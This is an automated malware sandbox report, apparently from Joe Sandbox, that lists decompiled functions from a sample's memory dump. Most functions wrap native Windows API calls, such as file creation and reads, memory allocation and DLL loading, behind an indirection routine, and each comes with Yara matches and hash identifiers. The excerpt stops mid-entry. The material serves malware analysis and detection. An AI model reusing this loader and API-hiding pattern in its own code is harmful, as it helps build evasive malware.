                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 176 41e5ed-41e5f1 177 41e5f3-41e644 call 41f243 NtCreateFile 176->177 178 41e5b5-41e5ec call 41f243 176->178
                                                      C-Code - Quality: 60%
                                                      			E0041E5ED(char __ecx, char* __edx, void* __eflags, long _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t35;
				intOrPtr* _t36;

				asm("out 0x1e, eax");
				 *__edx = __ecx;
				if(__eflags > 0) {
					asm("in al, dx");
					_t23 = _a8;
					_t3 = _t23 + 0xa68; // 0xa90
					_t36 = _t3;
					E0041F243(_a8[5], _t23, _t36, _a8[5], 0, 0x27);
					return  *((intOrPtr*)( *_t36))(_a12, _a16, _a20, _a24, _a28, _t35);
				} else {
					__ebp = __esp;
					__eax = _a4;
					__ecx =  *((intOrPtr*)(__eax + 0x14));
					_t11 = __eax + 0xa6c; // 0xa6c
					__esi = _t11;
					__eax = E0041F243( *((intOrPtr*)(__eax + 0x14)), __eax, __esi,  *((intOrPtr*)(__eax + 0x14)), 0, 0x28);
					__edx = _a48;
					__eax = _a44;
					__ecx = _a40;
					__edx = _a36;
					__eax = _a32;
					__ecx = _a28;
					__edx = _a24;
					__eax = _a20;
					__ecx = _a16;
					__edx = _a12;
					__eax = _a8;
					__ecx =  *__esi;
					__eax = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                                      0x0041e5ed
                                                      0x0041e5ef
                                                      0x0041e5f1
                                                      0x0041e5b5
                                                      0x0041e5b6
                                                      0x0041e5c2
                                                      0x0041e5c2
                                                      0x0041e5ca
                                                      0x0041e5ec
                                                      0x0041e5f3
                                                      0x0041e5f4
                                                      0x0041e5f6
                                                      0x0041e5f9
                                                      0x0041e602
                                                      0x0041e602
                                                      0x0041e60a
                                                      0x0041e60f
                                                      0x0041e612
                                                      0x0041e615
                                                      0x0041e61c
                                                      0x0041e620
                                                      0x0041e624
                                                      0x0041e628
                                                      0x0041e62c
                                                      0x0041e630
                                                      0x0041e634
                                                      0x0041e638
                                                      0x0041e63c
                                                      0x0041e640
                                                      0x0041e642
                                                      0x0041e643
                                                      0x0041e644
                                                      0x0041e644

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: c2940defc1f95fd30518e2f85d8637610e3b44d043bb621822615bc0800cbd0f
                                                      • Instruction ID: bf58b033f4df4117e7473d6230dd595e805d3fddb0b0a0f6bc399e62227eb295
                                                      • Opcode Fuzzy Hash: c2940defc1f95fd30518e2f85d8637610e3b44d043bb621822615bc0800cbd0f
                                                      • Instruction Fuzzy Hash: C71112B2604208BFCB08DF98DC85EEB37ADEF8C754F048258BA0C97241D631E951CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040CF23 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 200 40cf23-40cf3f 201 40cf47-40cf4c 200->201 202 40cf42 call 420f13 200->202 203 40cf52-40cf60 call 421433 201->203 204 40cf4e-40cf51 201->204 202->201 207 40cf70-40cf81 call 41f7b3 203->207 208 40cf62-40cf6d call 4216b3 203->208 213 40cf83-40cf97 LdrLoadDll 207->213 214 40cf9a-40cf9d 207->214 208->207 213->214
                                                      C-Code - Quality: 100%
                                                      			E0040CF23(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E00420F13( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00421433(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E004216B3( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F7B3(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                      0x0040cf2c
                                                      0x0040cf3f
                                                      0x0040cf42
                                                      0x0040cf47
                                                      0x0040cf4c
                                                      0x0040cf56
                                                      0x0040cf5b
                                                      0x0040cf5e
                                                      0x0040cf60
                                                      0x0040cf68
                                                      0x0040cf6d
                                                      0x0040cf6d
                                                      0x0040cf74
                                                      0x0040cf7c
                                                      0x0040cf7f
                                                      0x0040cf81
                                                      0x0040cf95
                                                      0x00000000
                                                      0x0040cf97
                                                      0x0040cf9d
                                                      0x0040cf51
                                                      0x0040cf51
                                                      0x0040cf51

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF95
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 2d8971ab7e40216f1ab7880a6b3bd7b14f9e717b1ef25046fbf816b69d0e01bc
                                                      • Instruction ID: 5e04f6221a37e6357fdc510ce1da2c9258563d4a4a23712c115eaecd70357e5d
                                                      • Opcode Fuzzy Hash: 2d8971ab7e40216f1ab7880a6b3bd7b14f9e717b1ef25046fbf816b69d0e01bc
                                                      • Instruction Fuzzy Hash: D30152B1E4010EABDF10DBA1DD82F9EB3789B54308F0042A6E908A7280F634EB448B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E69D Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 215 41e69d-41e6a1 216 41e6a3-41e6ec call 41f243 NtReadFile 215->216 217 41e6ed-41e6ef 215->217
                                                      APIs
                                                      • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 32c8df3c70d67261ae50247031a770c3232371363107fb8c2be793b250d4e9c9
                                                      • Instruction ID: afefd89c63c408e271d207366b207e4e6e1d150e5249734bbce09756756f7a8e
                                                      • Opcode Fuzzy Hash: 32c8df3c70d67261ae50247031a770c3232371363107fb8c2be793b250d4e9c9
                                                      • Instruction Fuzzy Hash: 2FF014B6200208AFCB04DF9ACC84EEB77A9EF8C754F118258BE0D97240D630E941CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E5F3 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 220 41e5f3-41e644 call 41f243 NtCreateFile
                                                      C-Code - Quality: 100%
                                                      			E0041E5F3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                      0x0041e602
                                                      0x0041e60a
                                                      0x0041e640
                                                      0x0041e644

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                      • Instruction ID: 896d7442baf9be4756d905739e1f90aa296932759f722aab2a73c44ca3a6dc04
                                                      • Opcode Fuzzy Hash: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                      • Instruction Fuzzy Hash: D3F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E6A3 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 223 41e6a3-41e6ec call 41f243 NtReadFile
                                                      C-Code - Quality: 37%
                                                      			E0041E6A3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                      0x0041e6b2
                                                      0x0041e6b2
                                                      0x0041e6ba
                                                      0x0041e6e8
                                                      0x0041e6ec

                                                      APIs
                                                      • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                      • Instruction ID: a52c969a109bbc10a8a1a781a5aa37a0394cb6bb67041f9c77339075023d92d4
                                                      • Opcode Fuzzy Hash: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                      • Instruction Fuzzy Hash: 4EF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BA0DA7241C630E8118BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E7D3 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 226 41e7d3-41e7e9 227 41e7ef-41e810 NtAllocateVirtualMemory 226->227 228 41e7ea call 41f243 226->228 228->227
                                                      C-Code - Quality: 100%
                                                      			E0041E7D3(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                      0x0041e7ea
                                                      0x0041e80c
                                                      0x0041e810

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                      • Instruction ID: 27bf8a3fb07fce7131f8418fc0fb77bd2b10fdbd594230fdd84e61d9d7c2cc87
                                                      • Opcode Fuzzy Hash: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                      • Instruction Fuzzy Hash: BBF01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159BE0897241C630F911CBB4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041E723 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041E723(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                      0x0041e73a
                                                      0x0041e748
                                                      0x0041e74c

                                                      APIs
                                                      • NtClose.NTDLL(00410328,00000000,?,00410328,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E748
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_vokkqsp.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                      • Instruction ID: 9c4ed7dd7ad381e5692115c9670513ce9f617838e6ca6e8741f9ee3af2ac2269
                                                      • Opcode Fuzzy Hash: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                      • Instruction Fuzzy Hash: 3CD01776604214ABD610EBA9DC89FD77BACDF48664F0184A9BA1C5B242C571FA0086E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ca9673f3ae0644b396a1594a7c4336876b21773c0ba6c7f527f01b7f528083ec
                                                      • Instruction ID: 3d1615de6c56f06f0ff5e36b46861abd4723f7fadd185fb075f4862fd2935f2c
                                                      • Opcode Fuzzy Hash: ca9673f3ae0644b396a1594a7c4336876b21773c0ba6c7f527f01b7f528083ec
                                                      • Instruction Fuzzy Hash: E190026160100503D24171694404656040ED7D1381F91C032A1014555FDA659992F171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 474b4846cb7e3150ab55ec08d1e9969b35fb9b48e5218bfae338c75501cddc2d
                                                      • Instruction ID: 6df4891800f47df5f9e08221899be906ae1fcf80be08c15367bcbe41161ac993
                                                      • Opcode Fuzzy Hash: 474b4846cb7e3150ab55ec08d1e9969b35fb9b48e5218bfae338c75501cddc2d
                                                      • Instruction Fuzzy Hash: 0590027120100413D25161694504747040DD7D1381F91C432A0414558EE6969952F161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: df0676b926bb5472795a346498651246e71f42d804a780eeda38b72e3b04fadc
                                                      • Instruction ID: 331cc2321284339b9588ba9105258c812fadb2e59b93484b8013687dd2800182
                                                      • Opcode Fuzzy Hash: df0676b926bb5472795a346498651246e71f42d804a780eeda38b72e3b04fadc
                                                      • Instruction Fuzzy Hash: 15900261242041535685B1694404547440AE7E1381B91C032A1404950DD566A856E661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ae21ca3e4c32c633432756de54acf6eeefc6ae974910485529e618fc5eac9993
                                                      • Instruction ID: f49a0107b9a24f2d1451da864ef388e1cba7168369bc5c709a1ee77fd4b7d807
                                                      • Opcode Fuzzy Hash: ae21ca3e4c32c633432756de54acf6eeefc6ae974910485529e618fc5eac9993
                                                      • Instruction Fuzzy Hash: 269002A134100443D24061694414B460409D7E2341F51C035E1054554ED659DC52B166
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a82f4fe4707a46e40235d3fcdbe986c6af214773b6a1d2925c56fe3a1d79f335
                                                      • Instruction ID: a2b8023129af706a9904be323226642d2fc4e06943a47bfcf3b7b67adb9b6ac0
                                                      • Opcode Fuzzy Hash: a82f4fe4707a46e40235d3fcdbe986c6af214773b6a1d2925c56fe3a1d79f335
                                                      • Instruction Fuzzy Hash: 879002B120100403D280716944047860409D7D1341F51C031A5054554FD6999DD5B6A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4dba4587f79ef45a55e2cbf286225c860941c0fe209a95e3da76f7aa65347950
                                                      • Instruction ID: 991ae33388391909576dd74927282791e14e25267cd5d5ee5abb74eb19a36c74
                                                      • Opcode Fuzzy Hash: 4dba4587f79ef45a55e2cbf286225c860941c0fe209a95e3da76f7aa65347950
                                                      • Instruction Fuzzy Hash: 8B900261601000434280717988449464409FBE2351B51C131A0988550ED5999865A6A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 732c9e6a75c5b9a01135da0f5770f8be45ba7ec58b1801fc82b76b218e484222
                                                      • Instruction ID: e6a4cf25f9f5dac928e8201cc246889bd2c2f20e61966c61743369ccb8fbb7fe
                                                      • Opcode Fuzzy Hash: 732c9e6a75c5b9a01135da0f5770f8be45ba7ec58b1801fc82b76b218e484222
                                                      • Instruction Fuzzy Hash: D490027120140403D2406169481474B0409D7D1342F51C031A1154555ED6659851B5B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 5a4f160dc68b6b12274edf87a56c7cb7fd88fb8bc9d77bb1a06be446e458bae4
                                                      • Instruction ID: c0574123a9398dfb9eb4c910035748f7a6044fb5c1d95491d4f3f7f3fd387dff
                                                      • Opcode Fuzzy Hash: 5a4f160dc68b6b12274edf87a56c7cb7fd88fb8bc9d77bb1a06be446e458bae4
                                                      • Instruction Fuzzy Hash: EB90026121180043D34065794C14B470409D7D1343F51C135A0144554DD9559861A561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ff8dac8ab9cde65165966810d1f137b3e885e3d67f8e3d053847fb572b21d313
                                                      • Instruction ID: 015ec985d69ca0388917617d075288e35ce77591b3fdcf7ce383e8298028bb3d
                                                      • Opcode Fuzzy Hash: ff8dac8ab9cde65165966810d1f137b3e885e3d67f8e3d053847fb572b21d313
                                                      • Instruction Fuzzy Hash: 2D9002A120200003424571694414656440ED7E1341F51C031E1004590ED5659891B165
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ff61d4b89cc592a6f92bac2b60aa8507def5ef27d2ad820030280c01ed977935
                                                      • Instruction ID: 6fdc963d377834b0a064d8214de8bbad113d7f58b15d2d6f1667bfcf27c78586
                                                      • Opcode Fuzzy Hash: ff61d4b89cc592a6f92bac2b60aa8507def5ef27d2ad820030280c01ed977935
                                                      • Instruction Fuzzy Hash: 5C900265211000030245A5690704547044AD7D6391751C031F1005550DE6619861A161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b84cd31270c16cea646e6f1572b786bc9f134eabf36d529e01961f4f05f96de5
                                                      • Instruction ID: b62f8a6b413fb2177cdc4edd5fefbc2f2935ab137269409b8ec9dd0c6d14d3a7
                                                      • Opcode Fuzzy Hash: b84cd31270c16cea646e6f1572b786bc9f134eabf36d529e01961f4f05f96de5
                                                      • Instruction Fuzzy Hash: 0D90027120108803D2506169840478A0409D7D1341F55C431A4414658ED6D59891B161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c42421be56613383b2e6fd6afcb73933afe3cf6e9ed368bacdfaed5aa88b00df
                                                      • Instruction ID: 4ec6d0ab08d1ee59a6b4864bcf481c1903aaa66e194012fb41418201fa245892
                                                      • Opcode Fuzzy Hash: c42421be56613383b2e6fd6afcb73933afe3cf6e9ed368bacdfaed5aa88b00df
                                                      • Instruction Fuzzy Hash: F590027120100803D2C07169440468A0409D7D2341F91C035A0015654EDA559A59B7E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 25f84dd11038c7b066379deeaa3e0df1034076d379e80c4d829861b55b877b00
                                                      • Instruction ID: ceb4d3130027b1f5628589beb108d1fdc226f9c86e3ca676adc37d3f1e3a5871
                                                      • Opcode Fuzzy Hash: 25f84dd11038c7b066379deeaa3e0df1034076d379e80c4d829861b55b877b00
                                                      • Instruction Fuzzy Hash: 3F90026130100003D280716954186464409E7E2341F51D031E0404554DE9559856A262
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
